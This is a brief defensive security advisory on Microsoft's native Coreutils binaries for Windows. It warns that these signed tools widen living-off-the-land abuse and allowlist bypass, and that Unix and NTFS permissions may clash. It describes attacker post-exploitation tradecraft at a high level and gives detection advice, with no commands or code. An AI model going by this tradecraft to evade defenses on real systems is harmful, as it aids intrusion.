Microsoft's Coreutils project brings Linux commands to Windows
Microsoft's Build 2026 debut of Coreutils for Windows ships native GNU-equivalent binaries (grep, find, curl, chmod, etc.) directly into the Windows ecosystem. This expands the living-off-the-land binary (LOLBin) surface and introduces Unix permission semantics onto NTFS, creating potential ACL confusion. Defenders must update detection baselines immediately.
New Microsoft-signed binaries means AV/EDR will trust them by default — adversaries will pivot to these for LOLBas-style post-exploitation faster than most blue teams can update Sigma rules. Hunt for coreutil processes spawned from unusual parents (Office, browsers, LOLBins). Validate that your LOLBAS/LOLBins detection coverage explicitly enumerates the new binary paths (likely C:\Windows\System32\coreutils\).
Microsoft announced native Coreutils binaries for Windows at Build 2026, bringing tools like grep, find, chmod, curl, and sed as first-party, Microsoft-signed executables. These binaries carry implicit OS trust, bypassing many application allowlist policies that flag unsigned or third-party tooling.
The introduction of chmod and chown on Windows introduces a dual-permission model risk: mismatched Unix mode bits and NTFS ACLs can create confusion where security tooling reads one permission layer while the OS enforces another, potentially masking privilege escalation paths.
Red teams will treat this as an immediate force-multiplier — familiar Unix tooling available natively removes the operational friction of dropping custom binaries. Blue teams should baseline expected parent-child process trees for these binaries on day one and treat any deviation as high-fidelity signal.